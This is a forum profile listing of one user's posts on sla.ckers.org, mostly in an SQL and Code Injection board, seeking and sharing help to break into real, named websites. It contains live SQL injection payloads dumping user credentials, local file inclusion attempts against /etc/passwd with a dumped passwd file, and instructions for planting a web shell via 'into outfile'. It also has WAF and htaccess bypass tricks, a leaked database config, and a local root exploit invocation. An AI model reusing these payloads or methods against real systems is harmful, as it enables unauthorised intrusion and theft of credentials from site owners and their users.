Sla.ckers.org
Bug reports, feature enhancements or other complaints with the site, with us or just tell us what a miserable existence you have. No death threats or poetry please. Just kidding, no poetry please. 

Pages: 12Next
Current Page: 1 of 2
Results 1 - 30 of 41
3 years ago
TopSaT13
thanggiangho Wrote: ------------------------------------------------------- > ok- 403 forbidden when i add ' >>>no injection ( > not sure) > > :D 99% no vuln
Forum: SQL and Code Injection
3 years ago
TopSaT13
source code of page <?php session_start();?> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <?php //$link = mysql_connect("127.0.0.1","x","x") or die("Impossible de se connecter"); //mysql_select_db("khaldoun") or die("Could not select database"); if (!isset($_G
Forum: SQL and Code Injection
3 years ago
TopSaT13
thanks brothers but ... %00 and %0a can't do anything so i can't remove extension .php ?id=php://filter/read=convert.base64-encode/resource=/etc/passwd%0A => Warning: include(php://filter/read=convert.base64-encode/resource=/etc/passwd .php) : failed to open stream: No such file or directory in /var/www/site/index.php on line 70 and ?id=php://filter/read=convert.base64-encode/resource
Forum: SQL and Code Injection
3 years ago
TopSaT13
Reiners Wrote: ------------------------------------------------------- > as you see in the warning there is no filter and > the file name is passed successfully to the > include function. something else must be wrong. > are you sure the file exists? yes exist :) why i can't read /etc/passwd ?.. ?id=/etc/passwd result==> Warning: include(/etc/passwd.php) : failed to o
Forum: SQL and Code Injection
3 years ago
TopSaT13
Hey friends! i found an lfi vuln.. but i can't read /etc/passwd or any file not in vuln directory look : ?id=php://filter/read=convert.base64-encode/resource=index.php ===>> Warning: include(php://filter/read=convert.base64-encode/resource=index.php.php) : failed to open stream: No such file or directory in /var/www/site/index.php on line 70 ---------- and i del .php----- ?id=php:
Forum: SQL and Code Injection
3 years ago
TopSaT13
Powered by iWebKit :D
Forum: SQL and Code Injection
3 years ago
TopSaT13
VMw4r3 Wrote: ------------------------------------------------------- > Why do you want to bypass the filter when theres > no injection? yes...just like idea ! :D
Forum: SQL and Code Injection
3 years ago
TopSaT13
VMw4r3 Wrote: ------------------------------------------------------- > It looks like (') is filtered. ** yes bro i know but i need any method to bypass this filter ?
Forum: SQL and Code Injection
3 years ago
TopSaT13
Hi brothers all fine ^^ i found this web site vuln sqli delphi.dev-dz.com/autresites_detail.php?id=47 but when i add (') in value id=47' get Forbidden and order by 1 no error order by 10000000000000000-- no error but when i add (') like: autresites_detail.php?id=47' orde by 1--+ i get Forbidden please my brothers ..any bypass this forbidden ! Thanks a lot ! : )
Forum: SQL and Code Injection
3 years ago
TopSaT13
hi brothers...how ar u fine :D i found an vuln site rnd-dz.com/view_histo_fond_ar.php?news_id=-6%27+union+select+group_concat%28user_id,0x3e,username,0x3a,password,0x3e,email%29,2,3,4,5+from+sys_user--+ so when i use load file to read passwd file (or any file) ....not have any error and not get any file ?? like : rnd-dz.com/view_histo_fond_ar.php?news_id=-6%27+union+select+load_file%28%
Forum: SQL and Code Injection
3 years ago
TopSaT13
hi members, i have shell on secure server; many functions were disabled by security but i can't bypass it. info: PHP Version 5.2.15 disabled functions: Code: symlink,shell_exec,exec,proc_close,proc_open,popen,system,dl,passthru,escapeshellarg,escapeshellcmd,posix_getgid,virtual,posix_getgrgid,dl,set_time_limit,exec,pclose,proc_nice,proc_terminate,proc_get_status,pfsockopen,leak,apache_c
Forum: Full Disclosure
3 years ago
TopSaT13
Plitvix : tnx my brother tnx all i found solution : etc/passwd root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/bin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh sync:x:4:65534:sync:/bin:/bin/sync man:x:6:12:man:/var/cache/man:/bin/sh mail:x:8:8:mail:/var/mail:/bin/sh uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh proxy:x:13:13:proxy:/bin:/bin/sh www-data:x:33:33:www-data:/
Forum: SQL and Code Injection
3 years ago
TopSaT13
hi brothers ..fine? i found an sqli in universite.univ-tlemcen.dz .. when i put (') in search bar i found sql error Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/Annuaire/public_html/resultat_recherche.php on line 55 Erreur dans la requete: SELECT * FROM `enseignant` WHERE UPPER(nom) LIKE ''%' Avec erreur: You have an error in your SQL syntax; ch
Forum: SQL and Code Injection
3 years ago
TopSaT13
antivirus @ thank u bro :):) -------------------- waiting any helps for this injection http://www.abigailandeye.co.uk/client-gallery/index.php?pageId=104&start=0 Only For education
Forum: SQL and Code Injection
3 years ago
TopSaT13
Hi all, i found this problem http://www.abigailandeye.co.uk/client-gallery/index.php?pageId=104&start=0 when i add (') = Forbidden :( order by 1 no error :) but order by 1000000000000000000000000 no error i add --+ at end i found forbidden 0' order by 1 --+ = forbidden :-( any helps ?? please :) ----- http://www.ubiquisys.com/ub3b/pressreleases.php?id=115 forbidden :(
Forum: SQL and Code Injection
4 years ago
TopSaT13
hi all, everyone finds this problem when he wants to get root: result is mmap:permission denied because "Mmap_min_addr" not 0. everyone have how to bypass "Mmap_min_addr" and write on 0 "Zero" simple example: ------------------------------------------------------------- cat /proc/sys/vm/mmap_min_addr 0 gcc -o gayros local-root-exploit-gayros.c ./gayros we
Forum: Full Disclosure
4 years ago
TopSaT13
:O, i dont think those are hashes
Forum: SQL and Code Injection
4 years ago
TopSaT13
No comment..:@
Forum: SQL and Code Injection
4 years ago
TopSaT13
so hyrax i don't understand your problem give me url and i see good lookk
Forum: SQL and Code Injection
4 years ago
TopSaT13
hyrax @ look brother i'm not children, ok i can't understand your problem by txt file, + i'm Ethical Hacker . so respect me . 2.i post url because by url i can test and tell you where is problem ok :@ so be respect
Forum: SQL and Code Injection
4 years ago
TopSaT13
lik bro :) to intect shell you must floder chmod 777 lik uploads/ , img/ if you not find floder chmod 777 you can't intect shell exemple: upload is chmod 777 hxxt://google.com/web.php?id=-1 union select 1,2,'test',4,5 into outfile '/home/google/pub/upload/tst.php'-- google . com /upload/tst.php ..found :)
Forum: SQL and Code Injection
4 years ago
TopSaT13
mybe run
Forum: Full Disclosure
4 years ago
TopSaT13
@VMw4re i find it :D <?php //Header("Cache-control: private, no-cache"); //Header("Expires: Mon, 26 Jun 1997 05:00:00 GMT"); //Header("Pragma: no-cache"); //Header ("Last-Modified: " . gmdate ("D, d M Y H:i:s") . " GMT"); // This is an example of config.php $dbhost = 'localhost'; $dbuser = 'singart_singuser'; $dbpass =
Forum: SQL and Code Injection
4 years ago
TopSaT13
thank you my friend but , you use load file to read it?
Forum: SQL and Code Injection
4 years ago
TopSaT13
arabs found its since 200x
Forum: Bugs
4 years ago
TopSaT13
Hy all @hc0de .you can explique to me how to read config.php by this http://www.singaporeartmuseum.sg/exhibitions/details.php?id=-48+UNION+/*!SELECT*/+1,2,3,4,5,6,7,8,9,10,11,12,13,0x2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f6574632f706173737764
Forum: SQL and Code Injection
4 years ago
TopSaT13
@flics: Thank you my friend :) this: Options Indexes FollowSymLinks DirectoryIndex ssssss.htm AddType txt .php AddHandler txt .php ---------------- to bypass forbidden :) i use it on many server its run normally :p i think , the root disable some commands htaccess
Forum: SQL and Code Injection